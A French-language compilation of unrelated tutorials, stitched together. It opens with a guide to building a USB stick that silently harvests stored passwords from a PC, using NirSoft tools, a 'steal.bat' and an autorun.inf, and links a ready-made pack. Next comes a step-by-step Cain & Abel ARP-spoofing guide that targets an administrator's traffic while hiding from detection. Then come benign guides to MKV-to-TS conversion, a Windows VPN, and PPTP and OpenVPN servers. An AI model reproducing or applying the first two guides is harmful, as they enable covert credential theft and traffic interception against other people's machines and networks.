Ce tuto est bien entendu disponible Uniquement à des fin apprentissage

- MessenPass
- ChromePass
- Iepv
- Mailpv
- mspass
- netpass
- passwordFox
- pspv

Tous ces programmes sont des logiciels de récupération de mots de passe stockés sur le pc, disponibles sur le site de nirsoft

Si vous voulez récupérer des mots de passes bien précis , vous n’êtes pas obligés de télécharger l’ensemble des logiciels citez ci-dessus.

Exemple : Vous voulez récupérez seulement une adresse de messagerie ?
Alors il vous suffit seulement de télécharger MessenPass .

1ere Etape :

Il nous faut créé un Fichier Bat qui nous ouvrira les programmes de récupération de mot de passe et nous stockera les résultats dans un fichier texte
Pour cela :Ouvrir un nouveau document texte ( notepad ou autres)

Ecrire le code ci-dessous

Renommer ceci en steal.bat

2eme Etape :

Comme vous avez pu le voir dans les lignes ci dessus
Lorsque le logiciel sera exécutez , ces logs seront envoyé dans un dossier appelé Mdp .
Il nous faut donc créé un nouveau dossier Mdp ( tous le monde sait le faire je suppose )

3eme Etape :

Lorsque vous insérez votre cléf USB généralement une fenêtre apparait en nous demandant ce que l’on désire faire !
Dans cette étape nous allons créé une nouvelle option dans cette fenêtre , qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes du pc et de les stockés dans le dossier Mdp créé dans l’étape 2 .

Pour réalisez ceci ouvrir un nouveau document texte .

Puis insérez ce code :

Puis enregistrez sous : autorun.inf

4eme Etape :

Voila on arrive à la derniere étape , l’ultime étape je dirai …
C’est la plus facile ( d’ailleurs aucune étape n’étais difficile pour ainsi dire)
On va devoir mettre tous sur une clef usb

Wahouuuuu c’est trop dure , comment on fait ?
Je suis la les amis , je vous explique tout en détail .

Alors ouvrez votre cléf usb et inserez tout ce que vous avez télécharger et créé c’est à dire :

Si vous avez téléchargez tous les programmes et bien suivi toutes les étapes vous devez vous retrouvez avec tout ceci dans votre cléf USB .

- Autorun.inf
- ChromePass.exe
- Iepv.exe
- Mailpv.exe
- mspass.exe
- netpass.exe
- passwordFox.exe
- pspv.exe
- steal.bat
- Mdp ( c’est le dossier )

Si vous disposez de tout ceci .
Allez-y vous pouvez essayer

Pour les flémards :

Voici le Packs complets : http://www.multiupload.com/V3SVE93XY0

Fin du tutorial.

bonjour , aujourd’hui je vous présente ma trouvaille c’est a dire le spoofing avec cain et abel

Ce tuto est bien entendu disponible Uniquement à des fin apprentissage

ce tuto se décompose en 3 partie : L’arp spoofing ?
La demarche
La preuve

Nb: si vous n’avez pas cain et abel regardez ICI

L’arp spoofing?

Le protocole ARP (Address Resolution Protocol) implémente le mécanisme de résolution d’une adresse IP en une adresse MAC Ethernet. Les équipements réseaux communiquent en échangeant des trames Ethernet (dans le cas d’un réseau Ethernet bien sûr) au niveau de la couche liaison de données. Pour pouvoir échanger ces informations il est nécessaire que les cartes réseau possèdent une adresse unique au niveau Ethernet, il s’agit de l’adresse MAC (Media Access Control).

Quand un paquet IP doit être envoyé la machine expéditrice a besoin de l’adresse MAC du destinataire. Pour cela une requête ARP en broadcast est envoyée à chacune des machines du réseau physique local. Cette requête pose la question : « Quelle est l’adresse MAC associée à cette adresse IP ? ». La machine ayant cette adresse IP répond via un paquet ARP, cette réponse indiquant à la machine émettrice l’adresse MAC recherchée. Dés lors, la machine source possède l’adresse MAC correspondant à l’adresse IP destination des paquets qu’elle doit envoyer. Cette correspondance sera gardée pendant un certain temps au niveau d’un cache (pour éviter de faire une nouvelle requête à chaque paquet IP envoyé).

Cette attaque corrompt le cache de la machine victime. Le pirate envoie des paquets ARP réponse à la machine cible indiquant que la nouvelle adresse MAC correspondant à l’adresse IP d’une passerelle ou d’un proxy (par exemple) est la sienne. La machine du pirate recevra donc tout le trafic à destination de la passerelle, il lui suffira alors d’écouter passivement le trafic (et/ou le modifier). Il routera ensuite les paquets vers la véritable destination.

Tout ça paraît bien technique mais ce type d’attaque n’est pas réservé aux ceintures noires en réseau, loin de là. Il existe maintenant des applications qui permettent de faire tout ceci les doigts dans le nez et met en danger votre réseau.

La démarche

Lancez Cain. Dés la première ouverture on peut se rendre compte des multitudes de fonctionnalités que possède Cain.

On va tout d’abord voir si votre réseau est protégé ou non contre les attaques par arp spoofing.

1. Placez vous sur l’onglet Sniffer
2. Activez le sniffer
3. Appuyez sur Ajouter

La popup du scanner d’adresse MAC apparaît. Ici vous pouvez spécifier si vous voulez scanner tout votre sous réseau ou bien spécifier un range d’adresse ip. Les options complémentaires concernent les tests d’arp. Pour le premier scan ne saisissez pas ces options de test car elles sont relativement longues à effectuer.

Validez le scan et vous verrez toutes les machines de votre réseau apparaître.

Maintenant le grand test. Appuyez de nouveau sur ajouter, sélectionnez range et saisissez l’adresse de votre proxy ou d’une passerelle et cochez « all test ». Validez et attendez que Cain termine ses tests.
Le résultat s’affiche en bout de ligne. Si vous avez ne serait-ce qu’une étoile dans les cases suivantes, vous pouvez commencer à trembler car votre réseau est bel et bien sensible aux attaques ARP spoofing.

Cliquez sur configuration.

Une popup apparaît. Sélectionnez l’onglet APR et entrez une spoofed ip (une adresse qui n’existe pas bien sûr). Tout ceci pour éviter d’être repéré sur le réseau. Validez vos modifications. Placez vous sur l’onglet (en bas) APR.

Appuyez sur la croix bleue (add to list). Une popup apparaît dans la liste de gauche choisissez l’adresse IP de votre adminisrateur réseau et dans la fenêtre de droite votre proxy ou votre passerelle pour internet. Validez et appuyez sur le bouton jaune (start / stop APR). Vous venez d’activez l’arp spoofing entre lui et le proxy.

La preuve

avant de faire l’arp faite executer–>cmd–>arp -a et vous verrez 2 adresse
après la manip refaite la meme choses et vous verrez ce qui se passe

voila voici la fin de ce tuto

R: ce tuto n’est pas de moi. Il provient du site domlike
mais comme je n’ai pas vu de tuto sur arp sur ce forum je me disais que c’était interessant de poster

Publicité

Si vous êtes un heureux possesseur de la Freebox HD de Free, vous connaissez peut-être déjà les limitations du media player intégré. En effet, celle-ci ne sait normalement lire que les fichiers utilisant les containers AVI et TS.
Les fichiers AVI peuvent contenir de la vidéo au format DivX ou Xvid, et les fichiers TS peuvent contenir en plus du MPEG1 et MPEG2.
Côté audio, le MP3, l’AC3 et le DTS sont supportés.

C’est déjà pas mal, surtout quant on suit les déboires de la PS3 et la XBOX 360 pour le support du DivX (qui devrait arriver bientôt, comme dans les platines DivX à 29€90… ). Alors le XVid, ce n’est pas pour tout de suite. La PS3 se débrouille en revanche mieux pour les formats non propriétaires.

Mais la Freebox peut faire mieux, surtout quand on sait ce qui fait tourner la box : une puce de chez sigmadesigns plutôt à l’aise avec tous les formats et avec la HD. On est notamment tenté de vouloir lire du MKV et du H264, ces formats étant largement répandu dans le monde du rip HD (les rips de HD-DVD et de Blu-Ray en MKV sont légion, de même pour les séries en 720P).

La Freebox étant pour l’instant toujours incapable de traiter le MKV, l’astuce va consister à extraire le contenu du fichier MKV (soit très souvent une piste vidéo en h264 d’un côté et une piste audio en AC3 de l’autre), et à le remultiplexer dans un fichier TS.

Tout l’honneur revient aux membres du très actif forum http://www.homecinema-fr.com/ et en particulier Bobyewick, Alkasar et Ambamo.

La manipulation étant assez fastidieuse manuellement, un programme a été développé afin de l’automatiser : MKV2TS.

Voici les différentes étapes nécessaires au bon fonctionnement de ce programme :

Commencez par télécharger l’archive ci-dessous :

Télécharger MKV2TS sur le site d’Alkasar.

Une fois l’archive téléchargée, il faut la décompresser en utilisant par exemple WinRAR.

Allez ensuite dans le dossier « MKV2TS\tools\filter-mkv2ts » et double-cliquez sur « _elecard_filter.bat » qui enregistrera des codecs sur votre système.

Vous pouvez maintenant lancer l’exécutable « MKV2TS.exe« .

L’interface du programme se présente comme ceci :

Voici maintenant comment paramétrer chacun des champs :

• MKV Video : Il s’agit de la vidéo MKV que vous voulez lire.
• Temp Directory : C’est le dossier pour stocker les fichiers temporaires. Attention, il faut beaucoup de place. Parfois au moins 3 fois la taille de la vidéo. Les plantages du programme proviennent parfois du manque de place disponible.
• Ts Video : le fichier de sortie avec l’extension .ts qui sera à transférer sur le disque dur de votre Freebox HD.
• Audio 1 et Audio 2 : permet de gérer 2 pistes audio qui pourront être intégrées au fichier TS. Vous pouvez également en supprimer une si besoin. Le DTS est réencodé.
• Forced FPS : c’est le nombre d’images par seconde qui sera utilisé pour la vidéo en sortie. Normalement, la valeur à utiliser est la même que pour la source d’origine ( « Framerate » dans la partie « Video » ).
• Split (bug) : cette case permet de découper le fichier mp4 utilisé au cours de la conversion en plusieurs fichiers de taille inférieure. Découper ainsi la vidéo permet d’éviter le bug d’un des outils utilisé en interne par MKV2TS. Tentez 1500M pour un DVD5 et 1750M pour un DVD9.
• Change Level : pour que tout fonctionne correctement, il faut cocher cette case. Normalement, si dans la partie « Video » « Profil/Level » est à « High », alors « Change Level » doit être sur « 4.1″. Si le profil est « Main », « Change Level » doit être à « 4.0″.
• Pour le reste, les paramètres par défaut devraient convenir, lancez donc la conversion grâce au bouton « Convert« . Vous pouvez suivre l’évolution de la procédure dans « log-hex« .

Il ne vous reste plus qu’à transférer le fichier .TS sur le FTP de la Freebox HD : hd1.freebox.fr.

A vous les films HD et séries HD!

Remarque : Pour les sous-titres, seuls les fichiers AVI supportent les fichiers .srt. Pour les TS les .srt ne sont pas supportés. La seule solution est de réencoder le TS (ou le fichier AVI) avec les sous-titres intégrés. Ou alors vous pouvez attendre qu’une âme charitable le fasse à votre place. (Merci Juanito pour les séries ).

1

Cliquez sur le bouton « Démarrer », puis sur « Panneau de Configuration ».

2

Le panneau de configuration s’affiche. Double cliquez sur l’icone « Centre Réseau et partage ».

3

Le « Centre Réseau et partage » s’affiche. Dans le volet de gauche, cliquez sur le lien « Gérer les connexions réseau ».

4

La liste des connexions réseau configurées sur votre ordinateurs apparaît.
Dans le menu « Fichier », cliquez sur « Nouvelle connexion entrante… ».

Pour faire apparaître la barre de menus, cliquez sur le menu Organiser, Disposition puis, sélectionnez Barre de menus

5

La fenêtre « Qui est autorisé à se connecter à cet ordinateur ? » s’affiche. Sélectionnez le(s) utilisateur(s) autorisé(s) à se connecter, puis cliquez sur le bouton « Suivant ».

Si l’utilisateur n’apparaît pas dans la liste, cliquez sur le bouton « Ajouter », renseignez les différents champs et cliquez sur le bouton « OK ».
Si vous désirez le mot passe d’un compte d’utilisateur, sélectionnez le compte, puis cliquez sur le bouton « Propriétés du compte ». Saisissez le nouveau mot de passe dans les champs appropriés, puis cliquez sur le bouton « OK ».

6 La fenêtre « Comment les personnes se connecteront-elles ? » s’affiche. Cochez la proposition « Par Internet », puis cliquez sur le bouton « Suivant ».

7 La fenêtre « Les logiciels réseau permettent à cet ordinateur… » s’affiche. Sélectionnez les services, protocoles et clients que vous désirez activer. Par défaut, nous vous conseillons de ne rien modifier.

Sélectionnez le protocole Protocole Internet version 4 (TCP/Ipv4), puis cliquez sur le bouton Propriétés…

8

La fenêtre « Propriétés IP entrantes » s’affiche. Différentes options apparaîssent…

• L’option « Autoriser les correspondants appelant à accéder à mon réseau local » permet de configurer votre ordinateur comme routeur : si l’option est décochée, l’appelant n’aura accès qu’à votre ordinateur ; si l’option est cochée, l’appelant pourra accéder aux autres ordinateurs de votre réseau.
• L’option « Attribuer les adresses IP » automatiquement avec le DCHP permet d’assigner automatiquement les adresses TCP/IP.
• L’option « Spécifier des adresses IP » permet d’indiquer une plage d’adresse à utiliser pour les appelants. Cette option est utile lorsqu’il n’y a pas, sur le réseau, de serveur DHCP de configuré.
  REMARQUE : le nombre d’adresses allouées est calculé en fonction des adresses tapées dans les zones « De » et « À » et ce nombre s’affiche dans la zone « Total ».
• L’option « Autoriser l’ordinateur appelant à spécifier sa propre adresse IP » inverse le processus d’attribution de l’adresse. Ce n’est plus votre ordinateur qui attribue une adresse mais l’ordinateur de l’appelant.
  ATTENTION : cette option risque de provoquer des conflits d’adresses IP sur votre réseau. Cochez la proposition « Spécifier des adresses IP.
• Cliquez sur le bouton « OK ».

10 La fenêtre « Les logiciels réseau permettent à cet ordinateur… » s’affiche. Cliquez sur le bouton « Autoriser l’accès ».

11 La fenêtre « Les personnes que vous avez choisies peuvent désormais se connecter à cet ordinateur » s’affiche. Mémorisez le nom de l’ordinateur mentionné. Vous devrez le communiquer à tous les appelants.

Votre ordinateur est maintenant configuré correctement en tant que serveur pour un réseau local virtuel via une connexion VPN.

Poptop est un serveur VPN fonctionnant sous Linux. Il utilise le protocole PPTP, qui est géré nativement sous Windows, et facile à installer sous Linux.

Installation et configuration :

• Installer Poptop

apt-get install pptpd

Le serveur se lance tout seul

• Configuration

Attention : la configuration est à vérifier auprès de quelqu’un d’expérimenté. A utiliser à ses risques et péril pour le moment.

/etc/pptpd.conf

# Adresse IP attribuée au serveur sur le VPN
localip 192.168.66.1

# Adresses IP attribuables automatiquement par le VPN
remoteip 192.168.66.128-255

/etc/ppp/pptpd-options

# Nom du VPN, il sera utilisé dans le fichier "/etc/ppp/chap-secrets"
name LeNomDuVPN

# Ca doit avoir un rapport avec l'encryptage et l'authentification
require-mschap-v2
require-mppe-128

# Configuration des DNS
# Il semble que ce soit aussi possible dans /etc/PPP/options
# mais je ne connais pas la différence
ms-dns 208.67.222.222
ms-dns 208.67.220.220

/etc/ppp/chap-secrets

# Fichier des comptes utilisateurs
# Il est possible d'utiliser l'authentification du système (ou Samba), mais ce n'est pas le but ici
# Le paramètre "LeNomDuVPN" doit correspondre avec le paramètre "name" du fichier "/etc/ppp/pptpd-options"

# Un utilisateur dont l'IP est définie manuellement
# Attention à ne pas définir une IP se trouvant dans "remoteip"
tutu LeNomDuVPN UnAutreMotDePasse 192.168.66.85

# Un utilisateur dont l'IP est obtenue dans "remoteip" de /etc/pptpd.conf
toto LeNomDuVPN UnMotDePasse *

Redémarrer le VPN

/etc/init.d/pptpd restart

Tester le VPN : essayer de se connecter en utilisant la connexion normale à un VPN PPTP (voir la connexion normale sous Windows, en haut de la page).

Note sur la sécurité : le protocole PPTP est considéré comme moins sécurisé que OpenVPN (qui utilise OpenSSL), mais il est suffisament sécurisé pour la plupart des usages.
Source : http://poptop.sourceforge.net/dox/protocol-security.phtml

Tuto By Korben

Sous Linux (Ubuntu)

L’authentification des clients/serveur se fera par clés SSL.

Étape obligatoire… l’installation des packages :

sudo apt-get install openssl openvpn

Générations des clés SSL

Nous commençons par générer la « Clé d’Autorité de Certification Maître » :

cp /usr/share/doc/openvpn/examples/easy-rsa ~/openvpn/ -R
cd ~/openvpn/2.0/

Il faut maintenant renseigner quelques variables dans le fichier vars. Mon éditeur préféré étant emacs…

sudo emacs vars

Puis remplir les champs « export » à votre convenance, dans mon cas :

export KEY_SIZE=1024
export KEY_COUNTRY="FR"
export KEY_PROVINCE="Haut-de-Seine"
export KEY_CITY="Boulogne"
export KEY_ORG="xxxxxx"
export KEY_EMAIL="xxxx...@gmail.com"

On lance le scripts de configuration :

source ./vars

On nettoie les clés déjà créees :

./clean-all

Et nous finissons par générer les clés (ca.crt et ca.key) qui seront stockées automatiquement dans un dossier « keys » :

./build-ca

Nous devons maintenant générer la clés d’authentification du serveur :

./build-key-server nom-au-choix

(Veillez a ne pas mettre d’espace) Puis les clés des clients :

./build-key client1

Nous devrons fournir à chaque client le ca.crt (commun à tous) ainsi qu’une .crt et un .key uniques (ici, client1.crt, client1.key).

Configuration d’OpenVPN

Nous devons générer les paramètres Diffie-Hellman (cryptage) qui seront utilisés par le serveur VPN :
<< Pierre : ça peut prendre très longtemps il parait

./build-dh

Il faut ensuite éditer le fichier de configuration de votre serveur :

emacs /etc/openvpn/nom-au-choix.conf

Voici, pour exemple, mon fichier de configuration :

port 500 # modification du port pas défaut pour passer par le port UDP
proto udp #Configure le VPN en mode UDP. Si besoin, TCP fonctionne aussi.
dev tun
ca keys/ca.crt
cert keys/server.crt #emplacement du certificat SSL
key keys/server.key #emplacement de la clée SSL
dh dh1024.pem # Emplacement de la clée de cryptage
server 10.8.0.0 255.255.255.0 #ip désirée pour le serveur
ifconfig-pool-persist ipp.txt
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
push "redirect-gateway def1" # Définit le serveur VPN comme passerelle par défaut pour les clients.
push "dhcp-option DNS 10.8.0.1" # Définit le serveur VPN comme DNS par défaut

Je vous laisse googler le reste des options, relativement classiques (cryptages, protocole, max client etc.)
Il ne vous reste plus qu’a copier les certificats SSL nécéssaires au serveur

mkdir /etc/openvpn/keys/

cd ~/openvpn/2.0/keys

cp ca.crt server.crt server.key /etc/openvpn/keys/

cp dh1024.pem /etc/openvpn/

Il ne vous reste plus qu’a lancer le serveur via le daemon

/etc/init.d/openvpn start

ou via le bin

/etc/openvpn votre-fichier.conf

source: http://www.dailytechfix.net/2009/07/31/configuration-dopenvpn-server-en-full-tunnelling-sur-ubuntu/

Si vous avez choisi d’activer l’option « redirect-gateway » afin que votre serveur VPN serve de passerelle par défaut à vos clients, vous devez configurer vos interfaces réseaux ainsi que votre pare feu pour autoriser le transit du flux. Pour cela, rendez-vous ici